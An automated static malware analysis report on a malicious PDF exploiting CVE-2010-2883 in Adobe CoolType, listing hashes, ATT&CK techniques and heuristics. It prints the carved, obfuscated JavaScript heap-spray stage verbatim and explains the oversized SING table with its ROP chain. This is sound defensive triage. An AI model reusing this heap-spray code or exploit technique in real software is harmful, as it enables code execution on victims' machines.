Malicious PDF — malware analysis report

Static analysis result for SHA-256 6c9b75913c5922e5…

Verdict: MALICIOUS

File type: PDF

Size: 67.7 KB
First seen: 2013-02-22
MD5: 9f3cc2ab91e25f7bd7ecec37d9ca8d1c
SHA-1: 74c8c7decb3cec452a19bd75150767cd9e5c271e
SHA-256: 6c9b75913c5922e5e2bec1e09e1d4272266ddd9925d99f52a308513b96c528b5
Risk score: 128

Malware Insights

MITRE ATT&CK

  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that is heavily obfuscated but appears designed to download and execute a second-stage payload. The critical heuristic firing for CVE-2010-2883 indicates exploitation of that vulnerability, which the JavaScript most likely leverages to achieve code execution. The embedded URL, while not directly referenced by the obfuscated script, suggests a potential C2 communication channel.

Machine Learning

  • Nyx PDF Classifier: malicious (score 0.9998)

Heuristics (5)

  • CVE-2010-2883 Adobe CoolType SING uniqueName stack overflow (critical; exact CVE match; rule CVE_2010_2883)
    An embedded font carries an sfnt SING (Smart INdependent Glyphlets) table whose uniqueName field is overflowed: the structural shape of the CVE-2010-2883 Adobe CoolType stack buffer overflow. A legitimate glyphlet SING table is a few dozen bytes with a short, printable, NUL-terminated uniqueName; the exploit oversizes the table and fills uniqueName with an icucnv36.dll ROP chain and/or the 0x0c0c0c0c heap-spray landing value.
  • Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low; 1 related finding; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.bitstream.com (in PDF document text)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: javascript_obj0012_000.js
  Kind: pdf-javascript-stream
  Source: PDF /JS object 12 at offset 0x10A83
  Size: 758 bytes
  SHA-256: 4a970dddcd9cbc2e473e112008ca94ca12590df8644a7442818d0be7d9acdde9
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
  Preview script (first 1,000 lines of the extracted script):
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."3e14u%b182u%a9fcu%" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
Artifact 2
  Filename: font_00_sfnt_off0000035e.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x35E
  Size: 67284 bytes
  SHA-256: 35b6962eeb9aa4a8acb1109b74102eb9d08ab437da4460a890e43cabdc8c59d3
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (static shellcode analysis found candidate code region(s); indicators: heap spray 0x41 (A))